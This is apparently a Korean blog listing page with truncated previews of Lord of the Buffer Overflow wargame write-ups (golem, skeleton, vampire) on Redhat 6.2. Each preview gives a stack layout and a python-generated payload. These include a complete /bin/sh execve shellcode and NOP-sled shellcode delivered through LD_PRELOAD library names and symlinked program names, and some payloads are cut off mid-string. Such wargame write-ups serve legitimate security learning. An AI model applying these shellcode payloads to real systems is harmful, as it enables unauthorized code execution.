LOB Redhat 6.2 - golem golem - FPOStack : buffer[40] + sfp[4] + ret[4]sfp : 0xbffffa98Payload : ./darkknight `python -c 'print "\x90"*17 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x98"'` Using Frame Pointer OverFlow 더보기 LOB Redhat 6.2 - skeleton skeleton - stack destroyerStack : LD_PRELOAD + i[4] + buffer[40] + sfp[4] + ret[4]Shared library : gcc -shared -fPIC -o `python -c 'print "\x90"*100 + "\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\x.. 더보기 LOB Redhat 6.2 - vampire vampire - argv hunterStack : saved_argc[4] + i[4] + buffer[40] + sfp[4] + ret[4] + Program name Symbolic Link : ln -s skeleton `python -c 'print "\x90"*100 + "\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xb.. 더보기 이전 1 ··· 59 60 61 62 63 64 65 ··· 75 다음